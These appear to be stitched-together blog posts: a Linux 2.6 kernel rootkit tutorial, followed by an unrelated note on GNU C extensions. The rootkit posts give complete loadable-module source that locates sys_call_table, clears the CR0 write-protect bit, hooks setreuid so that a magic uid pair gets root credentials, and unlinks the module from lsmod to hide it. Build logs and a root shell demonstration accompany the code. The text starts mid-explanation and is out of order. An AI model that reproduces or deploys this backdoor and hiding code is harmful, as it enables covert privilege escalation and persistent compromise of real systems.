So we have in the “buf” variable a string: the string shows our kernel version and other informations. We only extract the kernel version through the “strsep()” function (man strsep). In kernel space we can’t use the “strtok()” function (it’s not defined), so we have to use the “strsep()” one.
Now we have the kernel version: we can proceed to the second and third steps.
First we must open the “/boot/System.map-kernel_version” file where we have to replace “kernel_version” with the kernel version found at step 1. We read strings line by line from this file until the “sys_call_table” string is found. We tokenize the string obtaining the relative address and we’ll use it to hijack the system calls we are interested.
Here is the code:

...
#define BOOT_PATH		"/boot/System.map-"
...

static int find_sys_call_table (char *kern_ver)
 {

	char buf[MAX_LEN];
	int i = 0;
	char *filename;
	char *p;
	struct file *f = NULL;

	mm_segment_t oldfs;

	oldfs = get_fs();
	set_fs (KERNEL_DS);
	
	filename = kmalloc(strlen(kern_ver)+strlen(BOOT_PATH)+1, GFP_KERNEL);
	
	if ( filename == NULL ) {
	
		return -1;
	
	}
	
	memset(filename, 0, strlen(BOOT_PATH)+strlen(kern_ver)+1);
	
	strncpy(filename, BOOT_PATH, strlen(BOOT_PATH));
	strncat(filename, kern_ver, strlen(kern_ver));
	
	printk(KERN_ALERT "\nPath %s\n", filename);
	
	f = filp_open(filename, O_RDONLY, 0);
	
	if ( IS_ERR(f) || ( f == NULL )) {
	
		return -1;
	
	}

	memset(buf, 0x0, MAX_LEN);

	p = buf;

	while (vfs_read(f, p+i, 1, &f->f_pos) == 1) {

		if ( p[i] == '\n' || i == 255 ) {
		
			i = 0;
			
			if ( (strstr(p, "sys_call_table")) != NULL ) {
				
				char *sys_string;
				
				sys_string = kmalloc(MAX_LEN, GFP_KERNEL);	
				
				if ( sys_string == NULL ) { 
				
					filp_close(f, 0);
					set_fs(oldfs);
	
					kfree(filename);
	
					return -1;
	
				}

				memset(sys_string, 0, MAX_LEN);
				strncpy(sys_string, strsep(&p, " "), MAX_LEN);
			
				syscall_table = (unsigned long long *) simple_strtoll(sys_string, NULL, 16);
				
				kfree(sys_string);
				
				break;
			}
			
			memset(buf, 0x0, MAX_LEN);
			continue;
		}
		
		i++;
	
	}

	filp_close(f, 0);
	set_fs(oldfs);
	
	kfree(filename);

	return 0;
}

Code explanation:

- row 19: we allocate enaugh space to “filename” in order to contain the string “/boot/System.map-kernel_version”. The “kmalloc()” function is like the “malloc()” in kernel space. The second parameter is the kernel priority: “GFP_KERNEL” means “normal allocation”.
- rows 21 to 42: we open the “/boot/System.map-kernel_version” file;
- row 44: “p” points to “buf” because the “strsep()” function needs a “char **” as first parameter;
- row 46: in the “while” loop we read one byte at once (I want to store in “buf” only one line at once);
- row 48: if we have reached the end of line or we have read too much bytes, we can check for the “sys_call_table” string;
- rows 52 to 77: if there is match, we store into “sys_string” the first token of the line, that is:

c05d3180 R sys_call_table

As you can see the first token is exactly the syscall table address. In the row 72 we convert the address from a string format to a long integer through the “simple_strtoll()” function (it’s like the” strtoll()” function (man strtoll)). Next we assign this value to “syscall_table”.
- row 90: the “kfree()” function is like the “free()” function.

I show you the full module source code (“kernel_sys.c”): once we obtain the syscall table address we hijack the “__NR_setreuid32″ syscall (I suggest you read this and this if you have not already done so):

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/fcntl.h>
#include <asm/uaccess.h>
#include <linux/version.h>
#include <linux/syscalls.h>

#define PROC_V			"/proc/version"
#define BOOT_PATH		"/boot/System.map-"

#define MAX_LEN			256

unsigned long *syscall_table; 
int sys_found = 0;

asmlinkage int (* orig_setreuid) (uid_t ruid, uid_t euid);

asmlinkage int new_setreuid (uid_t ruid, uid_t euid) {

	struct cred *new;

	 if ((ruid == 7310) && (euid == 0137))	 {

		 printk(KERN_ALERT "[Correct] \n");

		#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) 	
			 		       		
			current->uid = current -> gid = 0;
		 	current -> euid = current -> egid = 0;
		 	current -> suid = current -> sgid = 0;
		 	current -> fsuid = current -> fsgid = 0;

		#else

  			new = prepare_creds();

  			if ( new != NULL ) {

	  			new->uid = new->gid = 0;
				new->euid = new->egid = 0;
				new->suid = new->sgid = 0;
				new->fsuid = new->fsgid = 0;

				commit_creds(new);
			}
		#endif

		 return orig_setreuid (0, 0);
	 }

	 return orig_setreuid (ruid, euid);
}

char *search_file(char *buf) {
	
	struct file *f;
	char *ver;
	mm_segment_t oldfs;

	oldfs = get_fs();
	set_fs (KERNEL_DS);
	
	f = filp_open(PROC_V, O_RDONLY, 0);
	
	if ( IS_ERR(f) || ( f == NULL )) {
	
		return NULL;
	
	}
	
	memset(buf, 0, MAX_LEN);
	
	vfs_read(f, buf, MAX_LEN, &f->f_pos);
	
	ver = strsep(&buf, " ");
	ver = strsep(&buf, " ");
	ver = strsep(&buf, " ");
		
	filp_close(f, 0);	
	set_fs(oldfs);
	
	return ver;

}

static int find_sys_call_table (char *kern_ver)
 {

	char buf[MAX_LEN];
	int i = 0;
	char *filename;
	char *p;
	struct file *f = NULL;

	mm_segment_t oldfs;

	oldfs = get_fs();
	set_fs (KERNEL_DS);
	
	filename = kmalloc(strlen(kern_ver)+strlen(BOOT_PATH)+1, GFP_KERNEL);
	
	if ( filename == NULL ) {
	
		return -1;
	
	}
	
	memset(filename, 0, strlen(BOOT_PATH)+strlen(kern_ver)+1);
	
	strncpy(filename, BOOT_PATH, strlen(BOOT_PATH));
	strncat(filename, kern_ver, strlen(kern_ver));
	
	printk(KERN_ALERT "\nPath %s\n", filename);
	
	f = filp_open(filename, O_RDONLY, 0);
	
	if ( IS_ERR(f) || ( f == NULL )) {
	
		return -1;
	
	}

	memset(buf, 0x0, MAX_LEN);

	p = buf;

	while (vfs_read(f, p+i, 1, &f->f_pos) == 1) {

		if ( p[i] == '\n' || i == 255 ) {
		
			i = 0;
			
			if ( (strstr(p, "sys_call_table")) != NULL ) {
				
				char *sys_string;
				
				sys_string = kmalloc(MAX_LEN, GFP_KERNEL);	
				
				if ( sys_string == NULL ) { 
				
					filp_close(f, 0);
					set_fs(oldfs);
	
					kfree(filename);
	
					return -1;
	
				}

				memset(sys_string, 0, MAX_LEN);
				strncpy(sys_string, strsep(&p, " "), MAX_LEN);
			
				syscall_table = (unsigned long long *) simple_strtoll(sys_string, NULL, 16);
				
				kfree(sys_string);
				
				break;
			}
			
			memset(buf, 0x0, MAX_LEN);
			continue;
		}
		
		i++;
	
	}

	filp_close(f, 0);
	set_fs(oldfs);
	
	kfree(filename);

	return 0;
}

static int init(void) {

	char *kern_ver;
	char *buf;
	
	buf = kmalloc(MAX_LEN, GFP_KERNEL);
	
	if ( buf == NULL ) {
	
		sys_found = 1;
		return -1;
	
	}	

	printk(KERN_ALERT "\nHIJACK INIT\n");

	kern_ver = search_file(buf);
		
	if ( kern_ver == NULL ) {

		sys_found = 1;
		return -1;
	
	}
	
	printk(KERN_ALERT "Kernel version found: %s\n", kern_ver);
	
	if ( find_sys_call_table(kern_ver) == -1 ) {
	
		sys_found = 1;
		return -1;
	}

	sys_found = 0;
	
	write_cr0 (read_cr0 () & (~ 0x10000));
	
	orig_setreuid = syscall_table[__NR_setreuid32];
	syscall_table[__NR_setreuid32] = new_setreuid;

	write_cr0 (read_cr0 () | 0x10000);
	
	kfree(buf);
	
	return 0;
}

static void exit(void) {
	
	if ( sys_found == 0 ) {
	
		write_cr0 (read_cr0 () & (~ 0x10000));

		syscall_table[__NR_setreuid32] = orig_setreuid;

		write_cr0 (read_cr0 () | 0x10000);
	
	}
	
	printk(KERN_ALERT "\nHIJACK EXIT\n");

	return;
}


module_init(init);
module_exit(exit);

The “sys_found” variable is used for control purposes.
Here is the Makefile:

obj-m	:= kernel_sys.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Here is our simple script (“test.c”):

#include <stdio.h>

int main () {

        setreuid (7310, 0137);
        system ("/bin/sh");

        return 0;
}

We can compile it:

spaccio@spaccio-laptop:~$ make
make -C /lib/modules/2.6.35-24-generic/build SUBDIRS=/home/spaccio/Hacking/Syscall_Hijack/mod modules
make[1]: ingresso nella directory "/usr/src/linux-headers-2.6.35-24-generic"
  CC [M]  /home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.o
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c: In function ‘find_sys_call_table’:
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c:168: warning: cast to pointer from integer of different size
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c:168: warning: assignment from incompatible pointer type
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c: In function ‘init’:
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c:221: warning: assignment makes pointer from integer without a cast
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c:222: warning: assignment makes integer from pointer without a cast
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c: In function ‘exit’:
/home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.c:239: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.mod.o
  LD [M]  /home/spaccio/Hacking/Syscall_Hijack/mod/kernel_sys.ko
make[1]: uscita dalla directory "/usr/src/linux-headers-2.6.35-24-generic"
spaccio@spaccio-laptop:~$ 

Next we load the module and we check if it finds the correct version of kernel and if it opens the relative “System.map-kernel_version”:

spaccio@spaccio-laptop:~$ sudo insmod kernel_sys.ko
spaccio@spaccio-laptop:~$ dmesg | tail
[ 5085.877145] HIJACK INIT
[ 5085.877182] Kernel version found: 2.6.35-24-generic
[ 5085.877189] 
[ 5085.877191] Path /boot/System.map-2.6.35-24-generic
[ 5102.441298]
spaccio@spaccio-laptop:~$

Everything seems right.
Now we can test it with our simple script (“test.c”):

spaccio@spaccio-laptop:~$ gcc test.c -o test
spaccio@spaccio-laptop:~$ ./test
# whoami
root
# exit

It seems to work! Wow…

- Conclusions

I’ve showed you two ways to find the syscall table address: one at compile-time and the other at run-time.
You can use what you want and if you have any questions or suggests you can use comments.
Bye.

struct task_struct {
	volatile long state;	/* -1 unrunnable, 0 runnable, >0 stopped */
	void *stack;
	atomic_t usage;
	unsigned int flags;	/* per process flags, defined below */
	unsigned int ptrace;
	...
	struct list_head children;	/* list of my children */
	struct list_head sibling;	/* linkage in my parent's children list */
	struct task_struct *group_leader;	/* threadgroup leader */
	...
	/* process credentials */
	uid_t uid,euid,suid,fsuid;
	gid_t gid,egid,sgid,fsgid;
	struct group_info *group_info;
	...
};

In this structure are maintained all the task informations: some of these are the process credentials like the UID, EUID, ecc…
So if we’ll modify this field we can also modify the process credentials. We can set this field to 0 (root) as follows:

current->uid = current->gid = 0;
current->euid = current->egid = 0;
current->suid = current->sgid = 0;
current->fsuid = current->fsgid = 0;

Where “current” is macro for the task struct of the current process.
Previously I have specified “in the kernel versions < 2.6.29″, now you might ask: but the newer ones?
Since from the kernel versions >= 2.6.29 the “task_struct” was changed: this happens because was changed the logic of how access to the process credentials.
I suggest to read this paper (very very short paper) that explain detailed the new way to access/change the process credentials.
Now we have a new structure in the “task_struct”:

struct task_struct {
	...
	const struct cred *cred;	/* effective (overridable) subjective task
					 * credentials (COW) */
	...
};

The new structure “cred” is defined in “linux/cred.h”:

struct cred {
	...
	uid_t		uid;		/* real UID of the task */
	gid_t		gid;		/* real GID of the task */
	uid_t		suid;		/* saved UID of the task */
	gid_t		sgid;		/* saved GID of the task */
	uid_t		euid;		/* effective UID of the task */
	gid_t		egid;		/* effective GID of the task */
	uid_t		fsuid;		/* UID for VFS ops */
	gid_t		fsgid;		/* GID for VFS ops */
	...

In this struct we can find all the process credentials: we can modify them in this way:

struct cred *new;

new = prepare_creds();

if ( new != NULL ) {

	new->uid = new->gid = 0;
	new->euid = new->egid = 0;
	new->suid = new->sgid = 0;
	new->fsuid = new->fsgid = 0;

	commit_creds(new);
}

Now I’ll explain the used functions through the paper.
The “prepare_creds()”:

To alter the current process's credentials, a function should first prepare a
new set of credentials by calling:

struct cred *prepare_creds(void);

this locks current->cred_replace_mutex and then allocates and constructs a
duplicate of the current process's credentials, returning with the mutex still
held if successful.  It returns NULL if not successful (out of memory).

The “commit_creds()”:

When the credential set is ready, it should be committed to the current process
by calling:

int commit_creds(struct cred *new);

This will alter various aspects of the credentials and the process, giving the
LSM a chance to do likewise, then it will use rcu_assign_pointer() to actually
commit the new credentials to current->cred, it will release
current->cred_replace_mutex to allow ptrace() to take place, and it will notify
the scheduler and others of the changes.

This function is guaranteed to return 0, so that it can be tail-called at the
end of such functions as sys_setresuid().

We have now enough informations to create our first rootkit. Our rootkit will give us root credentials when we invoke a new shell with RUID == 3410 && EUID == 0143. We only need to hijack the “__NR_setreuid32″ syscall and check for the ruid and euid.
I have shown two ways to change the process credentials: we can unify them in a single kernel module simply checking for the kernel version using this macro:

#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)

	...

#else

	...

#endif

Now we can write the rootkit “rootkit.c”:

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/version.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d3180;

asmlinkage int (* orig_setreuid) (uid_t ruid, uid_t euid);

asmlinkage int new_setreuid (uid_t ruid, uid_t euid) {

	struct cred *new;

	 if ((ruid == 3410) && (euid == 0143))	 {

		 printk(KERN_ALERT "[Correct] \n");

		#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) 		 		       	current->uid = current -> gid = 0;
		 	current -> euid = current -> egid = 0;
		 	current -> suid = current -> sgid = 0;
		 	current -> fsuid = current -> fsgid = 0;

		#else

  			new = prepare_creds();

  			if ( new != NULL ) {

	  			new->uid = new->gid = 0;
				new->euid = new->egid = 0;
				new->suid = new->sgid = 0;
				new->fsuid = new->fsgid = 0;

				commit_creds(new);
			}
		#endif

		 return orig_setreuid (0, 0);
	 }

	 return orig_setreuid (ruid, euid);
}

static int init(void) {

	printk(KERN_ALERT "\nHIJACK INIT\n");

	write_cr0 (read_cr0 () & (~ 0x10000));

	orig_setreuid = syscall_table [__NR_setreuid32];
	syscall_table [__NR_setreuid32] = new_setreuid;

	write_cr0 (read_cr0 () | 0x10000);

	return 0;
}

static void exit(void) {

	write_cr0 (read_cr0 () & (~ 0x10000));

	syscall_table[__NR_setreuid32] = orig_setreuid;

	write_cr0 (read_cr0 () | 0x10000);

	printk(KERN_ALERT "MODULE EXIT\n");

	return;
}

module_init(init);
module_exit(exit);

I suggest to read my previous post to better understand this code.
The Makefile:

obj-m	:= rootkit.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

A simple script to test it (“test.c”):

#include

int main () {

        setreuid (3410, 0143);
        system ("/bin/sh");

        return 0;
}

Now I compile the kernel module:

spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod$ make
make -C /lib/modules/2.6.35-24-generic/build SUBDIRS=/home/spaccio/Hacking/Syscall_Hijack/mod modules
make[1]: ingresso nella directory "/usr/src/linux-headers-2.6.35-24-generic"
  CC [M]  /home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.o
/home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.c: In function ‘init’:
/home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.c:63: warning: assignment makes pointer from integer without a cast
/home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.c:64: warning: assignment makes integer from pointer without a cast
/home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.c: In function ‘exit’:
/home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.c:75: warning: assignment makes integer from pointer without a cast
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.mod.o
  LD [M]  /home/spaccio/Hacking/Syscall_Hijack/mod/rootkit.ko
make[1]: uscita dalla directory "/usr/src/linux-headers-2.6.35-24-generic"
spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod$

I compile the script:

spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod$ gcc test.c -o test

And finally test all:

spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod$ sudo insmod rootkit.ko
spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod$ ./test
# whoami
root
# exit
spaccio@spaccio-laptop:~/Hacking/Syscall_Hijack/mod

Enjoy this: for any questions use comments.
Bye.

If you have tried to execute rootkit wrote for 2.4.* kernels then you will know that them don’t work in the 2.6.* kernel systems.
In kernel 2.6.* the “sys_call_table” is no longer exported and you can’t access it directly: moreover the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:

extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer

But the table is still in the memory: if we know its memory address we can access it through a simple pointer. There are a lot of methods to find this address: the simplest is searching inside the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled: it contains all the symbols and their addresses used by the kernel.
The output of this file follows:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic
...
c018d140 t cgroup_remount
c018d260 T cgroup_path
c018d310 t allocate_cg_links
c018d410 t find_css_set
c018d7d0 T cgroup_attach_task
c018da40 T cgroup_clone
c018dcc0 t cgroup_tasks_write
c018dd90 t cgroup_release_agent
c018df50 t proc_cgroup_show
c018e180 t cgroup_pidlist_find
c018e320 t cgroup_write_event_control
c018e610 t pidlist_allocate
c018e640 t pidlist_array_load
...

We are only interested at the “sys_call_table” address:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table
c05d2180 R sys_call_table

- Bypass Kernel Write Protection

Now we have the table’s address: but if you have looked at the “grep” command you will have seen that there is an ‘R’: this means that this address is “read-only”.
Indeed the kernel poses some structures in the “read-only” memory zone: in this way it protects them against intentional or unintentional changes which can lead to system instability. So we have to set this structure in “read/write” mode if we want to modify them.
Fortunately, the kernel provides us with special functions for this task:

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

The “pages_rw” function sets the write mode on the page passed as an argument; the second one sets the read mode on the page passed as an argument. Bu we need the virtual address of the page in order to use it: we can use for this task the “virt_to_page()” function, that converts the virtual address of the page in the corresponding physical page of memory accessible by the kernel. In order to use the “pages_*” functions we have to know their addresses. We can obtain them from the “System.map” file:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro
c012fbb0 T set_pages_rw
c012fe80 T set_pages_ro

Now we can access and modify the sys_call_table in this way:

...

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

...

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

...

static int init(void)
{

    struct page *_sys_call_page;
    printk(KERN_ALERT "\nHIJACK INIT\n");

    _sys_call_page = virt_to_page(&syscall_table);

    pages_rw(_sys_call_page, 1);
    
    // now we can use the sys_call_table
    
    ...
}    

This is an example source code (hijack.c):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    struct page *sys_call_page_temp;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    sys_call_page_temp = virt_to_page(&syscall_table);
    pages_rw(sys_call_page_temp, 1);

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = new_write;  

    return 0;
}

static void exit(void) {

    struct page *sys_call_page_temp;
   
    sys_call_page_temp = virt_to_page(syscall_table);
    syscall_table[__NR_write] = original_write;  
    pages_ro(sys_call_page_temp, 1);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Here is a “Makefile” to compile the source code:

obj-m	:= hijack.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko

- Bypass CR0 Protection

Some CPUs have the 0-bit of the CR (control register) set to 0: this means that “protected mode” is enabled. The “protected mode” was introduced in Intel CPUs starting from Intel 80286. This bit is also called wp-bit: we can check if our CPU support this kind of protection in this way:

spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp
wp		: yes
wp		: yes

You can find here a brief description of the CR0 register. Reading from wikipedia you can see that bit 0 (WP) is the one that deals with the “protected mode”: if WP is set to 1 then the CPU is in “write-protect” mode; else it is in “read/write” mode.
If the CPU is in “write-protect” mode and if we try to load the “hijack.ko” module, the kernel will kill it:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
Killed

So if we set this bit to 0 we will have access to the memory pages (including the syscall table) in write mode.
Again the kernel provides us two functions:

#define read_cr0 () (native_read_cr0 ())
#define write_cr0 (x) (native_write_cr0 (x))

The native read/write functions are defined as follows:

static inline unsigned long native_read_cr0 (void)
{
         unsigned long val;
         asm volatile("movl %%cr0,%0\n\t" :"=r" (val));
         return val;
}

static inline void native_write_cr0 (unsigned long val)
{
         asm volatile("movl %0,%%cr0": :"r" (val));
}

The “read_cr0″ function returns the value of the register CR0; the “write_cr0″ function sets the bits of the register based on the value passed as parameter.
Now we can enable/disable the protected mode in such way:

/* disable protected mode

   I perform a not operation to 0x10000 ( so I have 0x01111). 
   Later I perform an AND operation between the current value 
   of the CR0 register and 0x01111. So the WP bit is set to 0 
   and the protected mode is disabled.

*/

write_cr0 (read_cr0 () & (~ 0x10000));

/* enable protected mode

   I perform an OR operation between the current value of 
   the CR0 register and 0x10000. So the WP bit is set to 1 
   and the protected mode is enabled.
   
*/
   
write_cr0 (read_cr0 () | 0x10000);

Follows “hijack.c” modified (“hijack2.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0 (read_cr0 () & (~ 0x10000));

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = new_write;  

    write_cr0 (read_cr0 () | 0x10000);

    return 0;
}

static void exit(void) {

    write_cr0 (read_cr0 () & (~ 0x10000));

    syscall_table[__NR_write] = original_write;  

    write_cr0 (read_cr0 () | 0x10000);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Makefile:

obj-m	:= hijack2.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module without problems:

spaccio@spaccio-laptop:~$ sudo insmod hijack2
spaccio@spaccio-laptop:~$ 

- Hide Kernel Module

We can simply hide our module: we can remove it from the module list (lsmod and /proc/modules). Look at the following source code (“hijack3.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>


static int init(void) {

    list_del_init(&__this_module.list);

    return 0;
}

static void exit(void) {

    return;
}

module_init(init);
module_exit(exit);

We compile and run it:

obj-m	:= hijack3.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

If we try to look through lsmod we cannot find our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack3
spaccio@spaccio-laptop:~$ lsmod
Module                  Size  Used by
kernel_redir            2200  1 
aes_i586                7280  2 
aes_generic            26875  1 aes_i586
rfcomm                 33811  6 
binfmt_misc             6599  1 
sco                     7998  2 
bnep                    9542  2 
l2cap                  37008  16 rfcomm,bnep
vboxnetadp              6454  0 
vboxnetflt             15216  0 
...
spaccio@spaccio-laptop:~$ lsmod |grep hijack3.ko
spaccio@spaccio-laptop:~$

This happens thanks to “list_del_init()” function. This function is defined as follows:

static inline void list_del_init (struct list_head * entry)
{
	 __list_del (entry->prev, entry->next);
	 INIT_LIST_HEAD (entry);
}

While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:

static inline void __list_del (struct list_head * prev, struct list_head * next)
{
	 next-> prev = prev;
	 prev-> next = next;
}

static inline void INIT_LIST_HEAD (struct list_head * list)
{
	 list-> next = list;
	 list-> prev = list;
}

So the “list_del_init()” function removes the name of our module from the doubly linked list that manages the list of modules: in this way can not be found by lsmod (or in /proc/modules).

- Conclusion

The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).
Bye.

- Nested Functions

A nested function is a function defined inside another function:

void foo() {

	int bar(int a) { return ++a; }
	int b = 0;

	b = bar(3);

	printf("b = %d\n", b);

	return;

}

In this example I have declared a nested function “bar” inside the “foo” function: the name of the nested function, obviously, is local to the block where it’s defined. The value of “b” will be 4.
The nested function can access all the variables defined first than the nested function.

void foo() {

        int z = 4;
	int bar(int a) { return a+z; }
	int b = 0;

	b = bar(3);

	printf("b = %d\n", b);

	return;

}

In this example, the value of “b” will be 7.

- Double-Word Integers

GNU C defines a new size (64 bit) of signed and unsigned integer: long long int and unsigned long long int. We can use them in arithmetic just like a simple int.

- Arrays of Variable Length

We can define variable-length automatic arrays: the ISO C90 forbids this type of array.
I.e.

void foo(int z) {

	int a[z];

	return;
}

In this example I define a size of “z” for the array “a”.

- Labeled Elements in Initializers

In C standard you have to initialize an array in a fixed order: you have to start from the first element of the array.
In the GNU C you can initilize an array in any order. I.e.:

void foo() {

	int a[] = {[3]=2, [4]=3};

	return;
}

In this example we define an array. It has 4 locations, but we don’t start to initialize from the first one: we start from the third location. The “0-1-2″ locations are initialized to 0, according to standard C.
This feature could be useful in a simple parser:

void foo() {

        int c;
	FILE *stream;

	char pars[] = {['a']=2, ['b']=3};

	for ( c=fgetc(stream); !pars[c] && c != EOF; c=fgetc(stream) ) {
		...
	}

	...

	return pars[c];
}

- Case Ranges

In GNU C we can declare a set of consecutive values in “switch” statement like this:

case low ... high:

In case of letters:

case 'A' ... 'C':

Or numbers:

case 1 ... 10:

The post is finished, but you can investigate this features or look up for others in the gnu site: Here.

Bye bye.